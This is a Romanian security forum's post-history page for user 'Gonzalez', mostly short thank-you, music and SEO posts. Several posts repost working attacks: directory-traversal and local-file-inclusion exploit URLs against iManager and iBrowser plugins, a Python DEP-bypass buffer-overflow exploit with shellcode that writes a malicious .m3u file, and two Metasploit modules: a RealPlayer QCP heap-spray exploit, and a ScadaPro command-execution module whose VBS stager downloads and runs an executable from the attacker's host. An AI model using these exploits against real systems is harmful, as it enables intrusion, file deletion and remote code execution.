Gonzalez
-
Posts
1576 -
Joined
-
Last visited
-
Days Won
9
Posts posted by Gonzalez
-
-
Mi-au facut un subdomeniu pe site-ul lor. lol
-Gonzalez
-
Mersi pentru informatii Nytro.
-Gonzalez
-
Good news
-Gonzalez
-
Danke.
-Gonzalez
-
-Gonzalez
-
Mersi pentru site.
-Gonzalez
-
Check out:
http://php.opensourcecms.com/scripts/show.php?catid=1&category=CMS%20/%20Portals
-Gonzalez
-
L-am intrebat pe Laur acum ceva timp si a spus ca e facut de la 0 de echipa lor, acuma nu stiu daca spune adevarul sau nu...
Cred si eu ca e facut de la 0, nu am reusit sa-l gasesc pe Google.
-Gonzalez
-
Ce script folosesc cei de la vplay.ro ? E custom sau il pot gasi pe Google, am incercat sa caut PHP script dar nu am dat de nici un script care sa semene cu cel de la vPlay. Stie careva unde pot gasi scriptul acela?
-Gonzalez
-
Social bookmarking sites pentru cei cu SEO.
http://www.social-bookmarking-sites-list.com/
-Gonzalez
-
Nu am dat search, greseala mea.
-Gonzalez
-
Au fost verificate in urma cu cateva luni:
1. http://forums.digitalpoint.com
2. http://www.vuju.com/
3. http://checkthisup.com
4. http://www.sitepoint.com/forums
5. http://www.thewebmasterforum.net
6. http://www.webmasterforums.com
7. http://www.allcoolforum.com
8. http://www.warriorforum.com
9. http://forums.webicy.com
10. http://thehyipforum.com
11. http://www.webmasterforumsonline.com
12. http://www.webmasters.am/forum
13. http://www.webmasterforums.net
14. http://www.devhunters.com
15. http://www.webmaster-forum.net
16. http://www.geekvillage.com/forums
17. http://www.zymic.com/forum
18. http://www.webmastershelp.com
19. http://www.webmasterdesk.org
20. http://www.webmasterground.com
21. http://developers.evrsoft.com/forum
22. http://www.websitebabble.com
23. http://www.elancetalk.com
24. http://www.talkingcity.com
25. http://www.australianwebmaster.com
26. http://www.wtricks.com
27. http://www.forums.webzonetalk.com
28. http://www.htmlforums.com
29. http://www.searchbliss.com/forum
30. http://www.webmasterize.com
31. http://www.webmasterserve.com
32. http://www.freehostforum.com
33. http://www.seorefugee.com/forums
34. http://www.cre8asiteforums.com/forums
35. http://forums.seo.ph
36. http://forums.delphiforums.com
37. http://www.web-mastery.net
38. http://www.webworkshop.net/seoforum/index.php
39. http://www.webproworld.com
40. http://www.bzimage.org
41. http://www.v7n.com/forums
42. http://www.dnforum.com
43. http://www.webcosmoforums.com
44. http://forums.webicy.com
45. http://forum.hittail.com/phpbb2/index.php
46. http://www.affiliateseeking.com/forums
47. http://siteownersforums.com/index.php
48. http://www.webmaster-forums.net
49. http://www.geekpoint.net
50. http://www.smallbusinessforums.org
51. http://forums.ukwebmasterworld.com
52. http://www.experienceadvertising.com/forum
53. http://opensourcephoto.net/forum
54. http://forums.seochat.com
55. http://forums.searchenginewatch.com
56. http://www.ihelpyou.com/forums
57. http://dishnews.medianetwork.co.in/yabb2/YaBB.pl
58. http://www.businesss-forum.com
59. http://www.9mb.com
60. http://acapella.harmony-central.com/forums
61. http://forums.seroundtable.com
62. http://www.submitexpress.com/bbs
63. http://www.startups.co.uk/6678842908...04/forums.html
64. http://www.webmaster-talk.com
65. http://forums.comicbookresources.com
66. http://www.clicks.ws/forum/index.php
67. http://www.acorndomains.co.uk
68. http://forums.onlinebookclub.org
69. http://www.ableton.com/forum
70. http://www.davidcastle.org/BB
71. http://www.webtalkforums.com
72. http://www.bloggapedia.com/forum
73. http://www.bloggertalk.com/forum.php
74. http://paymentprocessing.cc
75. http://www.directoryjunction.com/forums
76. http://www.internetmarketingforums.net
77. http://www.lex224.com/forums/index.php
78. http://forum.joomla.org
79. http://forum.mambo-foundation.org/index.php
80. http://www.simplemachines.org/community/index.php
81. http://www.namepros.com/index.php
82. http://loanofficerforum.com/forum
83. http://iq69.com/forums
84. http://forum.hot4s.com.au
85. http://forums.mysql.com
86. http://forums.amd.com/forum
87. http://softwarecommunity.intel.com/i...y/en-us/Forums
88. http://forums.cnet.com
89. http://seotalk.medianetwork.co.in
90. https://www.computerbb.org
91. http://forum.vbulletinsetup.com
92. http://www.irishwebmasterforum.com
93. http://www.app-developers.com
94. http://forums.stuffdaily.com
95. http://forums.seo.com
96. http://www.webdigity.com
97. http://www.inboundlinksforum.com
98. http://forums.gentoo.org
99. http://ubuntuforums.org
100. http://forum.textpattern.com
101. http://talk.iwebtool.com
102. http://www.frogengine.com/forum
103. http://www.capitaltheory.com
104. http://www.smsbucket.com/forums/
105. http://www.seoin.info
106. http://vidberry.com
107. http://www.teamaguilar.com/forum/
108. http://www.discuss4fun.com
109. http://www.fightagainstrecession.com -
Best encryption for network security.
http://www.crypo.com/
-Gonzalez
-
Mersi pentru link.
-Gonzalez
-
iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion Vulnerability
Vendor: net4visions.com
Product web page: http://www.net4visions.com
Affected version: <= 1.2.8 Build 02012008
Summary: With iManager you can manage your files/images on your webserver,
and it provides user interface to most of the phpThumb() functions. It works
either stand-alone or as a plugin to WYSIWYG editors like tinyMCE, SPAW,
htmlAREA, Xinha and FCKeditor.
Desc: Input passed to the 'd' parameter in /scripts/phpCrop/crop.php is not
properly sanitised before being used to delete files. This can be exploited
to delete files with the permissions of the web server via directory traversal
sequences passed within the 'd' parameter.
======================================================================
/scripts/phpCrop/crop.php:
----------------------------------------------------------------------
32: if( isset($_REQUEST['s']) ) {
33: //delete previous temp files
34: $matches = glob($d . '{*.jpg,*.JPG}', GLOB_BRACE);
35: if ( is_array ( $matches ) ) {
36: foreach ( $matches as $fn) {
37: @unlink($fn);
38: }
39: }
======================================================================
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Advisory ID: ZSL-2011-5043
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5043.php
15.09.2011
--
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/phpCrop/crop.php?s=1&d=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftest.txt%00 -
iManager Plugin v1.2.8 (lang) Local File Inclusion Vulnerability
Vendor: net4visions.com
Product web page: http://www.net4visions.com
Affected version: <= 1.2.8 Build 02012008
Summary: With iManager you can manage your files/images on your webserver,
and it provides user interface to most of the phpThumb() functions. It works
either stand-alone or as a plugin to WYSIWYG editors like tinyMCE, SPAW,
htmlAREA, Xinha and FCKeditor.
Desc: iManager suffers from a file inlcusion vulnerability (LFI) / file
disclosure vulnerability (FD) when input passed thru the 'lang' parameter
to imanager.php, rfiles.php, symbols.php, colorpicker.php, loadmsg.php,
ov_rfiles.php and examples.php is not properly verified before being used
to include files. This can be exploited to include files from local resources
with directory traversal attacks and URL encoded NULL bytes.
======================================================================
/langs/lang.class.php:
----------------------------------------------------------------------
67: function loadData() {
68: global $cfg;
69: include( dirname(__FILE__) . '/' . $this -> lang.'.php' );
70: $this -> charset = $lang_charset;
71: $this -> dir = $lang_direction;
72: $this -> lang_data = $lang_data;
73: unset( $lang_data );
74: include( dirname(__FILE__) . '/' . $cfg['lang'].'.php' );
75: $this -> default_lang_data = $lang_data;
76: }
======================================================================
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Advisory ID: ZSL-2011-5042
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5042.php
15.09.2011
--
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/imanager.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/colorpicker.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/loadmsg.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/ov_rfiles.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/rfiles.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/symbols.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/images/examples/examples.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00 -
iBrowser Plugin v1.4.1 (lang) Local File Inclusion Vulnerability
Vendor: net4visions.com
Product web page: http://www.net4visions.com
Affected version: <= 1.4.1 Build 10182009
Summary: iBrowser is an image browser plugin for WYSIWYG editors like
tinyMCE, SPAW, htmlAREA, Xinha and FCKeditor developed by net4visions.
It allows image browsing, resizing on upload, directory management and
more with the integration of the phpThumb image library.
Desc: iBrowser suffers from a file inlcusion vulnerability (LFI) / file
disclosure vulnerability (FD) when input passed thru the 'lang' parameter
to ibrowser.php, loadmsg.php, rfiles.php and symbols.php is not properly
verified before being used to include files. This can be exploited to
include files from local resources with directory traversal attacks and
URL encoded NULL bytes.
======================================================================
/langs/lang.class.php:
----------------------------------------------------------------------
67: function loadData() {
68: global $cfg;
69: include( dirname(__FILE__) . '/' . $this -> lang.'.php' );
70: $this -> charset = $lang_charset;
71: $this -> dir = $lang_direction;
72: $this -> lang_data = $lang_data;
73: unset( $lang_data );
74: include( dirname(__FILE__) . '/' . $cfg['lang'].'.php' );
75: $this -> default_lang_data = $lang_data;
76: }
======================================================================
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Advisory ID: ZSL-2011-5041
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5041.php
15.09.2011
--
http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/scripts/loadmsg.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/scripts/symbols.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00 -
# written to bypass OptIn/OptOut DEP policy
# tested on windows xp sp3 running in virtualbox
import sys
print "\n============================"
print " MY MP3 Player DEP Bypass "
print " Bypass OptIn/OptOut Policy "
print " Tested on Windows XP SP3 "
print " Written by Blake "
print "============================\n"
# calc.exe - 1014 bytes of space for shellcode
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x36\x42\x50\x5a")
buffer = "\x41" * 1024
eip = "\x99\x13\x09\x5d" # RETN - COMCTL32
rop = "\x42" * 4 # junk to compensate
rop += "\x8c\x39\x09\x5d" # POP EBX, RETN - COMCTL32
rop += "\xff\xff\xff\xff"
rop += "\x28\x90\x12\x77" # INC EBX, RETN - OLEAUT32
rop += "\x44\x94\x12\x77" # POP EBP, RETN - OLEAUT32
rop += "\xa4\x22\x86\x7c" # SetProcessDEPPolicy
rop += "\x36\x1c\x12\x77" # POP EDI, RETN - OLEAUT32
rop += "\x37\x1c\x12\x77" # RETN - OLEAUT32
rop += "\xd4\x1a\x12\x77" # POP ESI, RETN - OLEAUT32
rop += "\x37\x1c\x12\x77" # RETN - OLEAUT32
rop += "\xf7\x8c\x14\x77" # PUSHAD, RETN - OLEAUT32
nops = "\x90" * 20
junk = "\x42" * (2000 - len(nops + shellcode + rop))
print "[+] Creating malicious .m3u file"
try:
file = open("exploit.m3u","w")
file.write(buffer + eip + rop + nops + shellcode + junk)
file.close()
print "[+] File created"
except:
print "[x] Could not create file"
raw_input("\nPress any key to exit...\n") -
##
# $Id: realplayer_qcp.rb 13745 2011-09-17 06:48:33Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={})
super(update_info(info,
'Name' => "RealNetworks Realplayer QCP Parsing Heap Overflow",
'Description' => %q{
This module exploits a heap overflow in Realplayer when handling a .QCP file.
The specific flaw exists within qcpfformat.dll. A static 256 byte buffer is
allocated on the heap and user-supplied data from the file is copied within a
memory copy loop.
This allows a remote attacker to execute arbitrary code running in the context
of the web browser via a .QCP file with a specially crafted "fmt" chunk.
At this moment this module exploits the flaw on Windows XP IE6, IE7.
},
'License' => MSF_LICENSE,
'Version' => "$Revision: 13745 $",
'Author' =>
[
'Sean de Regge', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2011-2950'],
['OSVDB', '74549'],
['BID', '49172'],
# ZDI advisory
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-265/'],
# Vendor advisory
['URL', 'http://service.real.com/realplayer/security/08162011_player/en/'],
#Fix commit
['URL', 'http://lists.helixcommunity.org/pipermail/datatype-cvs/2011-April/015469.html'],
],
'Payload' =>
{
'Space' => 1024
},
'DefaultOptions' =>
{
'ExitFunction' => "process",
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'Internet Explorer 6 on XP SP3', { 'Nops' => "%u1414%u1414" } ],
[ 'Internet Explorer 7 on XP SP3', { 'Nops' => "%u0c0c%u0c0c" } ],
],
'DisclosureDate' => "Aug 16 2011",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
], self.class)
end
def get_target(cli, request)
#Default target
my_target = target
vprint_status("User-Agent: #{request.headers['User-Agent']}")
if target.name == 'Automatic'
agent = request.headers['User-Agent']
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
#Windows XP + IE 6
my_target = targets[1]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
#Windows XP + IE 7.0
my_target = targets[2]
elsif agent =~ /RMA/
#RealPlayer identifies itself as "RMA/1.0 (compatible; RealMedia)"
#when requesting our trigger file
return 'RMA'
else
#If we don't recognize the client, we don't fire the exploit
my_target = nil
end
end
return my_target
end
def exploit
#Set trigger file name
@filename = rand_text_alpha(rand(6) + 3)
#Create the trigger file
@trigger = build_trigger
super
end
def on_request_uri(cli, request)
#Pick the right target
vprint_status("Selecting target...")
my_target = get_target(cli, request)
if my_target.nil?
print_error("Target not supported")
send_not_found(cli)
return
end
vprint_status("URL: #{request.uri.to_s}")
#Send the trigger file upon request
if request.uri.match(/\.qcp$/)
print_status("Sending trigger file to #{cli.peerhost}:#{cli.peerport}")
send_response(cli, @trigger, { 'Content-Type' => 'application/octet-stream' })
return
end
vprint_status("Building shellcode...")
code = Rex::Text.to_unescape(payload.encoded)
vprint_status("Building spray...")
spray = build_spray(my_target, code)
#obfuscate on demand
vprint_status("Obfuscating javascript...")
if datastore['OBFUSCATE']
spray = Rex::Exploitation::JSObfu.new(spray)
spray.obfuscate
end
vprint_status("Building html...")
#Value for the 'Src' parameter of our ActiveX control
trigger_file = ""
if ("/" == get_resource[-1,1])
trigger_file = get_resource[0, get_resource.length - 1]
else
trigger_file = get_resource
end
trigger_file << "/#{@filename}.qcp"
html = <<-EOS
<HTML>
<HEAD>
</HEAD>
<BODY>
<script language='javascript'>
#{spray}
</script>
<OBJECT ID=RVOCX CLASSID="clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA" WIDTH=320 HEIGHT=240>
<PARAM NAME="SRC" VALUE="#{trigger_file}">
<PARAM NAME="CONTROLS" VALUE="ImageWindow">
<PARAM NAME="CONSOLE" VALUE="one">
<PARAM NAME="AUTOSTART" VALUE="true">
<EMBED SRC="#{trigger_file}" WIDTH=320 HEIGHT=240 NOJAVA=true CONTROLS=ImageWindow CONSOLE=one AUTOSTART=true>
</OBJECT>
</BODY>
EOS
print_status("Sending malicious page to #{cli.peerhost}:#{cli.peerport}...")
send_response( cli, html, {'Content-Type' => 'text/html'} )
end
def build_trigger()
overflow_size = 700
overflow_string = "\x11" * 700
#riff_mark
trigger = "\x52\x49\x46\x46"
#total_size
trigger << [0xed44 + overflow_size].pack("V")
#qlcm_tag
trigger << "\x51\x4c\x43\x4d"
#fmt_tag
trigger << "\x66\x6d\x74\x20"
#fmt_size
trigger << [0x96 + overflow_size].pack("V")
#fmt_content
trigger << "\x01\x00\x8d\xd4\x89\xe6\x76\x90"
trigger << "\xb5\x46\x91\xef\x73\x6a\x51\x00"
trigger << "\xce\xb4\x01\x00\x54\x49\x41\x20"
trigger << "\x49\x53\x2d\x31\x32\x37\x20\x45"
trigger << "\x6e\x68\x61\x6e\x63\x65\x64\x20"
trigger << "\x56\x61\x72\x69\x61\x62\x6c\x65"
trigger << "\x20\x52\x61\x74\x65\x20\x43\x6f"
trigger << "\x64\x65\x63\x2c\x20\x53\x70\x65"
trigger << "\x65\x63\x68\x20\x53\x65\x72\x76"
trigger << "\x69\x63\x65\x20\x4f\x70\x74\x69"
trigger << "\x6f\x6e\x20\x33\x20\x00\x00\x00"
trigger << "\x00\x00\x00\x00\x00\x00\x00\x00"
trigger << "\x00\x00\x00\x00\xc8\x32\x16\x00"
trigger << "\xa0\x00\x40\x1f\x10\x00\x05\x00"
trigger << "\x00\x00\x16\x04\x0a\x03\x05\x02"
trigger << "\x02\x01\x00\x00\x00\x00\x00\x00"
trigger << "\x00\x00\x00\x00\x00\x00\x00\x00"
trigger << "\x00\x00\x00\x00\x00\x00\x00\x00"
trigger << "\x00\x00\x00\x00\x00\x00"
trigger << overflow_string
#vrat_tag
trigger << "\x76\x72\x61\x74"
#vrat_size
trigger << [0x8].pack("V")
#vrat_content
trigger << "\x01\x00\x00\x00\x06\x13\x00\x00"
#data_tag
trigger << "\x64\x61\x74\x61"
#data_size
trigger << [0xec8a].pack("V")
#data_content
trigger << rand_text_alpha(0xec8a)
return trigger
end
def build_spray(mytarget, code)
spray = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{code}");
var nops = unescape("#{mytarget['Nops']}");
while (nops.length < 0x10000) nops += nops;
offset = nops.substring(0, 0x7BE0);
var shellcode = offset + code + nops.substring(0, 0x8000-offset.length-code.length);
while (shellcode.length < 0x20000) shellcode += shellcode;
block = shellcode.substring(0, (0x10000-6)/2);
heap_obj.gc();
for (var i=0; i < 0x1400; i++) {
heap_obj.alloc(block);
}
JS
spray = heaplib(spray)
return spray
end
end -
##
# $Id: scadapro_cmdexe.rb 13737 2011-09-16 08:23:59Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Measuresoft ScadaPro <= 4.0.0 Remote Command Execution',
'Description' => %q{
This module allows remote attackers to execute arbitray commands on
the affected system by abusing via Directory Traversal attack when using the 'xf'
command (execute function). An attacker can execute system() from msvcrt.dll to
upload a backdoor and gain remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Luigi Auriemma', # Initial discovery/poc
'mr_me <steventhomasseeley[at]gmail.com>', # msf
'TecR0c <tecr0c[at]tecninja.net>', # msf
],
'Version' => '$Revision: 13737 $',
'References' =>
[
#[ 'CVE', '?'],
#[ 'OSVDB', '?'],
[ 'BID', '49613'],
[ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],
[ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'],
# seemed pretty accurate to us
[ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'],
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
},
'Platform' => 'win',
'Targets' =>
[
# truly universal
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 16 2011'))
register_options(
[
Opt::RPORT(11234),
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
], self.class)
end
# couldn't generate a vbs or exe payload and then use the wF command
# as there is a limit to the amount of data to write to disk.
# so we just write out a vbs script like the old days.
def build_vbs(url, stager_name)
name_xmlhttp = rand_text_alpha(2)
name_adodb = rand_text_alpha(2)
tmp = "#{@temp_folder}/#{stager_name}"
vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "
vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"
vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "
vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "
vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"
return vbs
end
def on_request_uri(cli, request)
if request.uri =~ /\.exe/
print_status("Sending 2nd stage payload to #{cli.peerhost}:#{cli.peerport}...")
return if ((p=regenerate_payload(cli)) == nil)
data = generate_payload_exe( {:code=>p.encoded} )
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
return
end
end
def exploit
# In order to save binary data to the file system the payload is written to a .vbs
# file and execute it from there.
@payload_name = rand_text_alpha(4)
@temp_folder = "C:/Windows/Temp"
if datastore['SRVHOST'] == '0.0.0.0'
lhost = Rex::Socket.source_address('50.50.50.50')
else
lhost = datastore['SRVHOST']
end
payload_src = lhost
payload_src << ":" << datastore['SRVPORT'] << datastore['URIPATH'] << @payload_name << ".exe"
stager_name = rand_text_alpha(6) + ".vbs"
stager = build_vbs(payload_src, stager_name)
path = "..\\..\\..\\..\\..\\windows\\system32"
createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n"
download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n"
print_status("Sending 1st stage payload...")
connect
sock.get_once()
sock.put(createvbs)
sock.get_once()
sock.put(download_execute)
handler()
disconnect
super
end
end -
Coldplay - Violet Hill.mp3
-Gonzalez
-
Try Goooogle.
-Gonzalez
-
ACUM: Leone ft sierra refugee all stars - Big lesson
-Gonzalez
-
ACUM: Alpha blondy - Alpha kaya
-Gonzalez
Site prezentare produse
in Programare
Posted
Nu te costa nimic inafara de timp, daca sti putina programare poti face un site frumos si unic, ceea ce ii place lui domnu' Google.
-Gonzalez